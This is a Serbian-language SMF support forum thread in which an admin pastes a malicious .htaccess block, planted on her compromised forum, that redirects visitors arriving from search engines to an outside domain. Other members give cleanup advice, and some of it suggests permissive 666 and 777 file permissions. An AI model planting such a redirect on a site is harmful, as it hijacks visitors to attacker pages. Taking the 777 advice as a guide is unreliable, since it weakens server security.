News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

.htaccess

Started by Venera, June 17, 2012, 01:22:17 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

Venera

June 17, 2012, 01:22:17 PM
Već nekoliko puta sam našla u bazi da je u index.php fajlove ubačen neki kod na kraju stranice koji mi uveća sva slova na forumu, zabrani "pregledaj" opciju, a danas sam našla u public_html-u fajl: htaccess sledećeg sadražaja:

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

Nekoliko ljudi nije moglo da se uloguje na forum, a bili su zaraženi čak i fajlovi php~. Sve sam zaražene fajlove našla, izbrisala ta čuda, ljudi mogu na forum, ali šta dalje? To može da se dešava svaki drugi dan. DA li je ovo neki propust u smf zaštiti ili šta? Da li je neko od vas imao sličan problem i kako ste rešili? 

Jedino je licencirani AV Kasperski pokazao da postoji greška svi ostali, kao i antimalver pokazuju da je sve čisto, a ovo čudeo se širi po bazi.

Skipper.

#1
June 17, 2012, 02:01:19 PM
Ukloni taj htaccess, zamoli Nemanju da ti skenira forum, ažuriraj forum ako nisi. Pogledaj dozvole na folderima i fajlovima.
It's very simple. Scissors cuts paper, paper covers rock, rock crushes lizard, lizard poisons Spock, Spock smashes scissors, scissors decapitates lizard, lizard eats paper, paper disproves Spock, Spock vaporizes rock, and—as it always has—rock crushes scissors.

Venera

#2
June 17, 2012, 02:47:25 PM
Quote from: Skipper. on June 17, 2012, 02:01:19 PM
Ukloni taj htaccess, zamoli Nemanju da ti skenira forum, ažuriraj forum ako nisi. Pogledaj dozvole na folderima i fajlovima.

Uklonila sam to čudo i sve zaražene fajlove. Poslala sam Nemanji mejl sa detaljima, čekam odgovor. Što se dozvola na folderima i fajlovima tiče, tu nisam baš sigurna gde šta treba.  :-[

Skipper.

#3
June 17, 2012, 02:55:32 PM
644, 664 ili 666 za fajlove i 755, 775 ili 777 za foldere.
It's very simple. Scissors cuts paper, paper covers rock, rock crushes lizard, lizard poisons Spock, Spock smashes scissors, scissors decapitates lizard, lizard eats paper, paper disproves Spock, Spock vaporizes rock, and—as it always has—rock crushes scissors.

Venera

#4
June 17, 2012, 02:57:31 PM
Sad ću to da pogledam i prekontrolišem. Pitanje je kako zabraniti .htaccess fajlu da "uleti" u bazu. To je izgleda do zaštite na serveru ili do nekog propusta u SMF skripti.

Skipper.

#5
June 17, 2012, 02:59:49 PM
Pa baš i ne "uleće" u bazu, ali može da napravi problem. Najpre treba otkriti kako su ti upali u forum.
Aj postavi spisak modova da vidimo jel ima nešto sumnjivo.
Jel forum na poslednjoj verziji?
It's very simple. Scissors cuts paper, paper covers rock, rock crushes lizard, lizard poisons Spock, Spock smashes scissors, scissors decapitates lizard, lizard eats paper, paper disproves Spock, Spock vaporizes rock, and—as it always has—rock crushes scissors.

Braca

#6
June 18, 2012, 10:51:44 AM
Nece pomoci ali cisto informativno ... Imao sam svojevreemeno identican problem a otkrio sam da sam zarazen preko jedne skripte za kontakt formu koju sam koristio za jedan drugi sajt a koju sam (totalno tupavo) drzao u root folderu foruma.Koliko se secam broj zarazenih fajlova je bio toliki da je jedino sveza instalacija + stara MYSQL bilo resenje.Svakako,prestao sam da koristim "busnu" skriptu koju sam obrisao.Prijatelj koji mi je pomagao u resenju problema a koji se proifesionalno bavi web dizajnom mi je savetovao da pored uradjenog promenim i FTP i MYSQL usser i pass.To je bilo pre odprilike 2 godine,nisam naknadno imao slicnih problema.

Venera

#7
June 18, 2012, 11:22:55 AM
Hvala, Braco na tome što si podelio svoje iskustvo.  ;)

Menjala sam prošli put pass svuda i opet ću. ;)

Pregledala sam dozvole za foldere i fajlove. Bilo je u par fajlova podešeno na 777, ali greške sam nalazila većinom na dozvoli 666, a bivalo je i na 644, a na 777 je bilo nekih nezaraženih. Kako?!  :o

Evo spiska modova:

1.    SA Facebook   2.0 RC4 Rev58   
2.   Default Avatar   2.2   
3.   Sitemap   2.2.0   
4.   Hide Topics from Guests   3.0   
5.   RSS Feed Icon   1.1   
6.   Tidy Child Boards   1.3   
7.   Adk Back To Top   1.0
8.   Tinypic Plugin   1.0.0   
9.   Thank-O-Matic V2.0 by SMFsimple.com   2.0
10.   SimplePortal   2.3.5   
11.   Highslide 4 SMF   0.8.1   
12.   nCode Image Resizer   1.3.2   
13.   Top 10 Posters and Topic Starters Stats (Today, Week, Month, and Year)   2.6   
14.   Separate the sticky topics   1.0.0   
15.   Ultimate Profile   0.9.1   
16.   PM to New Members   1.2   
17.   Users Online Today   2.0   
18.   YouTube BBCode   2.6   
19.   Member Color Link   3.1   
20.   SMF 2.0.2 Update   1.0   

Nema grešaka u error logu. Sve deluje savršeno, ipak... "čuda" odnekud izbiju ponekad... :)

Branko.

#8
June 18, 2012, 02:57:01 PM
Treba poći i od pretpostavke da je neko došao do user/pass podataka za ftp.Nakon promjene svih lozinki, pokušaj da ih ne čuvaš čak ni na sopstvenom računaru.Nikako se ne logovati s tuđih računara, ne raditi to ni u prisustvu drugih.Razmisli i o mogućnosti da si skoro instalirala neki program na svom računaru jer ima svačega.
Prati preko ftp sve sumnjive promjene datuma kod svih fajlova, često neka sitnica može ukazati gdje je problem.
Strong people don't put others down, they lift them up.
A clever person solves a problem. A wise person avoids it.

Venera

#9
June 20, 2012, 04:24:51 AM
Hvala, Branko. Preduzela sam sve mere predostrožnosti. Redovno radim backup i kontrolišem da li ima nešto sumnjivo, pa videćemo da li će se ponoviti.

Pozdrav.  :)
Print
Go Up Pages1
User actions
Advertisement: